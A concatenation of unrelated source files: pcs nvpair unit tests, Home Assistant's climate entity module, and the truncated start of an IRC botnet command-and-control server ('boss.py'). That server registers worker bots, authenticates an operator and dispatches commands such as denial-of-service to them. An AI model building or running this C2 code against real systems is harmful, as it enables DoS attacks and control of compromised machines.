#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
if vm_inv:
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
| apache-2.0 |
ClusterLabs/pcs | pcs_test/tier0/lib/cib/test_nvpair.py | 3 | 16477 | from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import assert_xml_equal
from pcs_test.tools.xml import etree_to_str
from pcs.lib.cib import nvpair
from pcs.lib.cib.tools import IdProvider
# pylint: disable=no-self-use, protected-access
class AppendNewNvpair(TestCase):
def test_append_new_nvpair_to_given_element(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
id_provider = IdProvider(nvset_element)
nvpair._append_new_nvpair(nvset_element, "b", "c", id_provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b" name="b" value="c"></nvpair>
</nvset>
""",
)
def test_with_id_provider(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
provider = IdProvider(nvset_element)
provider.book_ids("a-b")
nvpair._append_new_nvpair(nvset_element, "b", "c", provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b-1" name="b" value="c"></nvpair>
</nvset>
""",
)
class UpdateNvsetTest(TestCase):
def test_updates_nvset(self):
nvset_element = etree.fromstring(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
<nvpair id="iattrs-c" name="c" value="d"/>
<nvpair id="iattrs-e" name="e" value="f"/>
</instance_attributes>
"""
)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(
nvset_element,
{
"a": "B",
"c": "",
"g": "h",
},
id_provider,
)
assert_xml_equal(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="B"/>
<nvpair id="iattrs-e" name="e" value="f"/>
<nvpair id="iattrs-g" name="g" value="h"/>
</instance_attributes>
""",
etree_to_str(nvset_element),
)
def test_empty_value_has_no_effect(self):
xml = """
<instance_attributes id="iattrs">
<nvpair id="iattrs-b" name="a" value="b"/>
<nvpair id="iattrs-d" name="c" value="d"/>
<nvpair id="iattrs-f" name="e" value="f"/>
</instance_attributes>
"""
nvset_element = etree.fromstring(xml)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {}, id_provider)
assert_xml_equal(xml, etree_to_str(nvset_element))
def test_keep_empty_nvset(self):
xml_pre = """
<resource>
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
</instance_attributes>
</resource>
"""
xml_post = """
<resource>
<instance_attributes id="iattrs" />
</resource>
"""
xml = etree.fromstring(xml_pre)
nvset_element = xml.find("instance_attributes")
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {"a": ""}, id_provider)
assert_xml_equal(xml_post, etree_to_str(xml))
class SetNvpairInNvsetTest(TestCase):
def setUp(self):
self.nvset = etree.Element("nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_update(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr", "10", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_add(self):
nvpair.set_nvpair_in_nvset(self.nvset, "test", "0", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr2", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove_not_existing(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr3", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
class AppendNewNvsetTest(TestCase):
def test_append_new_nvset_to_given_element(self):
context_element = etree.fromstring('<context id="a"/>')
id_provider = IdProvider(context_element)
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
id_provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes">
<nvpair
id="a-instance_attributes-a" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
def test_with_id_provider_booked_ids(self):
context_element = etree.fromstring('<context id="a"/>')
provider = IdProvider(context_element)
provider.book_ids("a-instance_attributes", "a-instance_attributes-1-a")
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes-1">
<nvpair
id="a-instance_attributes-1-a-1" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-1-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
class ArrangeFirstNvsetTest(TestCase):
def setUp(self):
self.root = etree.Element("root", id="root")
self.nvset = etree.SubElement(self.root, "nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_empty_value_has_no_effect(self):
nvpair.arrange_first_nvset("nvset", self.root, {}, self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_update_existing_nvset(self):
nvpair.arrange_first_nvset(
"nvset",
self.root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-new_one" name="new_one" value="20"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_create_new_nvset_if_does_not_exist(self):
root = etree.Element("root", id="root")
nvpair.arrange_first_nvset(
"nvset",
root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<root id="root">
<nvset id="root-nvset">
<nvpair id="root-nvset-attr" name="attr" value="10"/>
<nvpair id="root-nvset-new_one" name="new_one" value="20"/>
<nvpair id="root-nvset-test" name="test" value="0"/>
</nvset>
</root>
""",
etree_to_str(root),
)
class GetNvsetTest(TestCase):
def test_success(self):
nvset = etree.XML(
"""
<nvset>
<nvpair id="nvset-name1" name="name1" value="value1"/>
<nvpair id="nvset-name2" name="name2" value="value2"/>
<nvpair id="nvset-name3" name="name3"/>
</nvset>
"""
)
self.assertEqual(
[
{"id": "nvset-name1", "name": "name1", "value": "value1"},
{"id": "nvset-name2", "name": "name2", "value": "value2"},
{"id": "nvset-name3", "name": "name3", "value": ""},
],
nvpair.get_nvset(nvset),
)
class GetValue(TestCase):
def assert_find_value(self, tag_name, name, value, xml, default=None):
self.assertEqual(
value,
nvpair.get_value(tag_name, etree.fromstring(xml), name, default),
)
def test_return_value_when_name_exists(self):
self.assert_find_value(
"meta_attributes",
"SOME-NAME",
"some-value",
"""
<context>
<meta_attributes>
<nvpair name="SOME-NAME" value="some-value" />
<nvpair name="OTHER-NAME" value="other-value" />
</meta_attributes>
</context>
""",
)
def test_return_none_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
)
def test_return_default_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value="DEFAULT",
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
default="DEFAULT",
)
def test_return_none_when_no_nvpair(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes />
</context>
""",
)
def test_return_none_when_no_nvset(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
</context>
""",
)
class GetNvsetAsDictTest(TestCase):
def test_no_element(self):
resource_element = etree.fromstring("<primitive/>")
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes/>
</primitive>
"""
)
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_non_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_multiple_nvsets(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
<meta_attributes>
<nvpair id="a" name="attr_name2" value="value2"/>
<nvpair id="b" name="other_name2" value="other-value2"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
class HasMetaAttribute(TestCase):
def test_return_false_if_does_not_have_such_attribute(self):
resource_element = etree.fromstring("""<primitive/>""")
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_true_if_such_meta_attribute_exists(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertTrue(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_false_if_meta_attribute_exists_but_in_nested_element(self):
resource_element = etree.fromstring(
"""
<group>
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
</meta_attributes>
</primitive>
</group>
"""
)
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
| gpl-2.0 |
partofthething/home-assistant | homeassistant/components/climate/__init__.py | 16 | 16930 | """Provides functionality to interact with climate devices."""
from abc import abstractmethod
from datetime import timedelta
import functools as ft
import logging
from typing import Any, Dict, List, Optional
import voluptuous as vol
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
PRECISION_WHOLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.helpers.typing import ConfigType, HomeAssistantType, ServiceDataType
from homeassistant.util.temperature import convert as convert_temperature
from .const import (
ATTR_AUX_HEAT,
ATTR_CURRENT_HUMIDITY,
ATTR_CURRENT_TEMPERATURE,
ATTR_FAN_MODE,
ATTR_FAN_MODES,
ATTR_HUMIDITY,
ATTR_HVAC_ACTION,
ATTR_HVAC_MODE,
ATTR_HVAC_MODES,
ATTR_MAX_HUMIDITY,
ATTR_MAX_TEMP,
ATTR_MIN_HUMIDITY,
ATTR_MIN_TEMP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
ATTR_SWING_MODE,
ATTR_SWING_MODES,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
ATTR_TARGET_TEMP_STEP,
DOMAIN,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
HVAC_MODES,
SERVICE_SET_AUX_HEAT,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HUMIDITY,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
DEFAULT_MIN_TEMP = 7
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_HUMIDITY = 30
DEFAULT_MAX_HUMIDITY = 99
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=60)
CONVERTIBLE_ATTRIBUTE = [ATTR_TEMPERATURE, ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH]
_LOGGER = logging.getLogger(__name__)
SET_TEMPERATURE_SCHEMA = vol.All(
cv.has_at_least_one_key(
ATTR_TEMPERATURE, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW
),
make_entity_service_schema(
{
vol.Exclusive(ATTR_TEMPERATURE, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_HIGH, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_LOW, "temperature"): vol.Coerce(float),
vol.Optional(ATTR_HVAC_MODE): vol.In(HVAC_MODES),
}
),
)
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Set up climate entities."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(
SERVICE_SET_HVAC_MODE,
{vol.Required(ATTR_HVAC_MODE): vol.In(HVAC_MODES)},
"async_set_hvac_mode",
)
component.async_register_entity_service(
SERVICE_SET_PRESET_MODE,
{vol.Required(ATTR_PRESET_MODE): cv.string},
"async_set_preset_mode",
[SUPPORT_PRESET_MODE],
)
component.async_register_entity_service(
SERVICE_SET_AUX_HEAT,
{vol.Required(ATTR_AUX_HEAT): cv.boolean},
async_service_aux_heat,
[SUPPORT_AUX_HEAT],
)
component.async_register_entity_service(
SERVICE_SET_TEMPERATURE,
SET_TEMPERATURE_SCHEMA,
async_service_temperature_set,
[SUPPORT_TARGET_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE_RANGE],
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY,
{vol.Required(ATTR_HUMIDITY): vol.Coerce(float)},
"async_set_humidity",
[SUPPORT_TARGET_HUMIDITY],
)
component.async_register_entity_service(
SERVICE_SET_FAN_MODE,
{vol.Required(ATTR_FAN_MODE): cv.string},
"async_set_fan_mode",
[SUPPORT_FAN_MODE],
)
component.async_register_entity_service(
SERVICE_SET_SWING_MODE,
{vol.Required(ATTR_SWING_MODE): cv.string},
"async_set_swing_mode",
[SUPPORT_SWING_MODE],
)
return True
async def async_setup_entry(hass: HomeAssistantType, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistantType, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class ClimateEntity(Entity):
"""Representation of a climate entity."""
@property
def state(self) -> str:
"""Return the current state."""
return self.hvac_mode
@property
def precision(self) -> float:
"""Return the precision of the system."""
if self.hass.config.units.temperature_unit == TEMP_CELSIUS:
return PRECISION_TENTHS
return PRECISION_WHOLE
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes."""
supported_features = self.supported_features
data = {
ATTR_HVAC_MODES: self.hvac_modes,
ATTR_MIN_TEMP: show_temp(
self.hass, self.min_temp, self.temperature_unit, self.precision
),
ATTR_MAX_TEMP: show_temp(
self.hass, self.max_temp, self.temperature_unit, self.precision
),
}
if self.target_temperature_step:
data[ATTR_TARGET_TEMP_STEP] = self.target_temperature_step
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_MIN_HUMIDITY] = self.min_humidity
data[ATTR_MAX_HUMIDITY] = self.max_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODES] = self.fan_modes
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODES] = self.preset_modes
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODES] = self.swing_modes
return data
@property
def state_attributes(self) -> Dict[str, Any]:
"""Return the optional state attributes."""
supported_features = self.supported_features
data = {
ATTR_CURRENT_TEMPERATURE: show_temp(
self.hass,
self.current_temperature,
self.temperature_unit,
self.precision,
),
}
if supported_features & SUPPORT_TARGET_TEMPERATURE:
data[ATTR_TEMPERATURE] = show_temp(
self.hass,
self.target_temperature,
self.temperature_unit,
self.precision,
)
if supported_features & SUPPORT_TARGET_TEMPERATURE_RANGE:
data[ATTR_TARGET_TEMP_HIGH] = show_temp(
self.hass,
self.target_temperature_high,
self.temperature_unit,
self.precision,
)
data[ATTR_TARGET_TEMP_LOW] = show_temp(
self.hass,
self.target_temperature_low,
self.temperature_unit,
self.precision,
)
if self.current_humidity is not None:
data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_HUMIDITY] = self.target_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODE] = self.fan_mode
if self.hvac_action:
data[ATTR_HVAC_ACTION] = self.hvac_action
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODE] = self.preset_mode
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODE] = self.swing_mode
if supported_features & SUPPORT_AUX_HEAT:
data[ATTR_AUX_HEAT] = STATE_ON if self.is_aux_heat else STATE_OFF
return data
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
raise NotImplementedError()
@property
def current_humidity(self) -> Optional[int]:
"""Return the current humidity."""
return None
@property
def target_humidity(self) -> Optional[int]:
"""Return the humidity we try to reach."""
return None
@property
@abstractmethod
def hvac_mode(self) -> str:
"""Return hvac operation ie. heat, cool mode.
Need to be one of HVAC_MODE_*.
"""
@property
@abstractmethod
def hvac_modes(self) -> List[str]:
"""Return the list of available hvac operation modes.
Need to be a subset of HVAC_MODES.
"""
@property
def hvac_action(self) -> Optional[str]:
"""Return the current running hvac operation if supported.
Need to be one of CURRENT_HVAC_*.
"""
return None
@property
def current_temperature(self) -> Optional[float]:
"""Return the current temperature."""
return None
@property
def target_temperature(self) -> Optional[float]:
"""Return the temperature we try to reach."""
return None
@property
def target_temperature_step(self) -> Optional[float]:
"""Return the supported step of target temperature."""
return None
@property
def target_temperature_high(self) -> Optional[float]:
"""Return the highbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def target_temperature_low(self) -> Optional[float]:
"""Return the lowbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def preset_mode(self) -> Optional[str]:
"""Return the current preset mode, e.g., home, away, temp.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def preset_modes(self) -> Optional[List[str]]:
"""Return a list of available preset modes.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def is_aux_heat(self) -> Optional[bool]:
"""Return true if aux heater.
Requires SUPPORT_AUX_HEAT.
"""
raise NotImplementedError
@property
def fan_mode(self) -> Optional[str]:
"""Return the fan setting.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def fan_modes(self) -> Optional[List[str]]:
"""Return the list of available fan modes.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def swing_mode(self) -> Optional[str]:
"""Return the swing setting.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
@property
def swing_modes(self) -> Optional[List[str]]:
"""Return the list of available swing modes.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
def set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
raise NotImplementedError()
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
await self.hass.async_add_executor_job(
ft.partial(self.set_temperature, **kwargs)
)
def set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
raise NotImplementedError()
async def async_set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
await self.hass.async_add_executor_job(self.set_humidity, humidity)
def set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
raise NotImplementedError()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
await self.hass.async_add_executor_job(self.set_fan_mode, fan_mode)
def set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
raise NotImplementedError()
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
await self.hass.async_add_executor_job(self.set_hvac_mode, hvac_mode)
def set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
raise NotImplementedError()
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
await self.hass.async_add_executor_job(self.set_swing_mode, swing_mode)
def set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
raise NotImplementedError()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
await self.hass.async_add_executor_job(self.set_preset_mode, preset_mode)
def turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
raise NotImplementedError()
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
await self.hass.async_add_executor_job(self.turn_aux_heat_on)
def turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
raise NotImplementedError()
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
await self.hass.async_add_executor_job(self.turn_aux_heat_off)
async def async_turn_on(self) -> None:
"""Turn the entity on."""
if hasattr(self, "turn_on"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_on)
return
# Fake turn on
for mode in (HVAC_MODE_HEAT_COOL, HVAC_MODE_HEAT, HVAC_MODE_COOL):
if mode not in self.hvac_modes:
continue
await self.async_set_hvac_mode(mode)
break
async def async_turn_off(self) -> None:
"""Turn the entity off."""
if hasattr(self, "turn_off"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_off)
return
# Fake turn off
if HVAC_MODE_OFF in self.hvac_modes:
await self.async_set_hvac_mode(HVAC_MODE_OFF)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
raise NotImplementedError()
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return convert_temperature(
DEFAULT_MIN_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return convert_temperature(
DEFAULT_MAX_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
async def async_service_aux_heat(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle aux heat service."""
if service.data[ATTR_AUX_HEAT]:
await entity.async_turn_aux_heat_on()
else:
await entity.async_turn_aux_heat_off()
async def async_service_temperature_set(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle set temperature service."""
hass = entity.hass
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp, hass.config.units.temperature_unit, entity.temperature_unit
)
else:
kwargs[value] = temp
await entity.async_set_temperature(**kwargs)
class ClimateDevice(ClimateEntity):
"""Representation of a climate entity (for backwards compatibility)."""
def __init_subclass__(cls, **kwargs):
"""Print deprecation warning."""
super().__init_subclass__(**kwargs)
_LOGGER.warning(
"ClimateDevice is deprecated, modify %s to extend ClimateEntity",
cls.__name__,
)
| mit |
undu/irc | botnet/boss.py | 1 | 12237 | #!/usr/bin/env python
import gevent
import logging
import os
import random
import re
import sys
import time
from gevent import socket
from gevent.event import Event
from gevent.queue import Queue
from logging.handlers import RotatingFileHandler
from optparse import OptionParser
from irc import IRCConnection, IRCBot
class BotnetWorker(object):
"""\
Simple class to track available workers
"""
def __init__(self, nick, name):
self.nick = nick
self.name = name
self.awaiting_ping = Event()
class Task(object):
"""\
A single command sent to any number of workers. Serves as the storage for
any results returned by the workers.
"""
_id = 0
def __init__(self, command):
"""\
Initialize the Task with a command, where the command is a string
representing the action to be taken, i.e. `dos charlesleifer.com`
"""
self.command = command
Task._id += 1
self.id = Task._id
self.data = {}
self.workers = set()
self.finished = set()
def add(self, nick):
"""\
Indicate that the worker with given nick is performing this task
"""
self.data[nick] = ''
self.workers.add(nick)
def done(self, nick):
"""\
Indicate that the worker with the given nick has finished this task
"""
self.finished.add(nick)
def is_finished(self):
return self.finished == self.workers
class BotnetBot(IRCBot):
"""\
Command and control bot for a simple Botnet
"""
def __init__(self, conn, secret, channel):
# initialize connection and register callbacks via parent class
super(BotnetBot, self).__init__(conn)
# store secret used for authentication and nick of administrator
self.secret = secret
self.boss = None
# store channels -- possibly use random channel for the command channel?
self.channel = channel
self.cmd_channel = channel + '-cmd'
# store worker bots in a dictionary keyed by nickname
self.workers = {}
# used for uptime
self.start = time.time()
# start a greenlet that periodically checks worker health
self.start_worker_health_greenlet()
# store tasks in a dictionary keyed by task id
self.tasks = {}
# get a logger instance piggy-backing off the underlying connection's
# get_logger() method - this logger will be used to store data from
# the workers
self.logger = self.get_data_logger()
# grab a reference to the connection logger for logging server state
self.conn_logger = self.conn.logger
# join the two channels
self.conn.join(self.channel)
self.conn.join(self.cmd_channel)
def get_data_logger(self):
return self.conn.get_logger('botnet.botnetbot.data.logger', 'botnet.data.log')
def send_workers(self, msg):
"""\
Convenience method to send data to the workers via command channel
"""
self.respond(msg, self.cmd_channel)
def send_user(self, msg):
"""\
Convenience method to send data to the administrator via the normal channel
"""
self.respond(msg, self.channel)
def start_worker_health_greenlet(self):
"""\
Start a greenlet that monitors workers' health
"""
gevent.spawn(self._worker_health_greenlet)
def _worker_health_greenlet(self):
while 1:
# broadcast a message to all workers
self.send_workers('!worker-ping')
# indicate that all workers are awaiting ping
for worker_nick in self.workers:
self.workers[worker_nick].awaiting_ping.set()
# wait two minutes
gevent.sleep(120)
dead = []
# find all workers who didn't respond to the ping
for worker_nick, worker in self.workers.items():
if worker.awaiting_ping.is_set():
self.conn_logger.warn('worker [%s] is dead' % worker_nick)
dead.append(worker_nick)
if dead:
self.send_user('Removed %d dead workers' % len(dead))
for nick in dead:
self.unregister(nick)
def require_boss(self, callback):
"""\
Callback decorator that enforces the calling user be botnet administrator
"""
def inner(nick, message, channel, *args, **kwargs):
if nick != self.boss:
return
return callback(nick, message, channel, *args, **kwargs)
return inner
def command_patterns(self):
return (
('\/join', self.join_handler),
('\/quit', self.quit_handler),
('!auth (?P<password>.+)', self.auth),
('!execute (?:(?P<num_workers>\d+)? )?(?P<command>.+)', self.require_boss(self.execute_task)),
('!print(?: (?P<task_id>\d+))?', self.require_boss(self.print_task)),
('!register (?P<hostname>.+)', self.register),
('!stop', self.require_boss(self.stop)),
('!status', self.require_boss(self.status)),
('!task-data (?P<task_id>\d+):(?P<data>.+)', self.task_data),
('!task-finished (?P<task_id>\d+)', self.task_finished),
('!task-received (?P<task_id>\d+)', self.task_received),
('!uptime', self.require_boss(self.uptime)),
('!worker-pong (?P<hostname>.+)', self.worker_health_handler),
('!help', self.require_boss(self.help)),
)
def join_handler(self, nick, message, channel):
self.logger.debug('%s joined #%s' % (nick, channel))
def quit_handler(self, nick, message, channel):
if channel == self.cmd_channel and nick in self.workers:
self.logger.info('Worker %s left, unregistering' % (nick))
self.unregister(nick)
def auth(self, nick, message, channel, password):
if not self.boss and password == self.secret:
self.boss = nick
self.logger.info('%s authenticated successfully' % nick)
return 'Success'
else:
self.logger.error('%s failed to authenticate' % nick)
def execute_task(self, nick, message, channel, command, num_workers=None):
task = Task(command)
self.tasks[task.id] = task
if num_workers is None or int(num_workers) >= len(self.workers):
# short-hand way of sending to all workers
num_workers = len(self.workers)
self.send_workers('!worker-execute %s:%s' % (task.id, task.command))
else:
num_workers = int(num_workers)
available_workers = set(self.workers.keys())
sent = 0
msg_template = '!worker-execute (%%s) %s:%s' % (task.id, task.command)
max_msg_len = 400
msg_len = len(msg_template % '')
msg_diff = max_msg_len - msg_len
available = msg_diff
send_to = []
# batch up command to workers
while sent < num_workers:
worker_nick = available_workers.pop()
send_to.append(worker_nick)
sent += 1
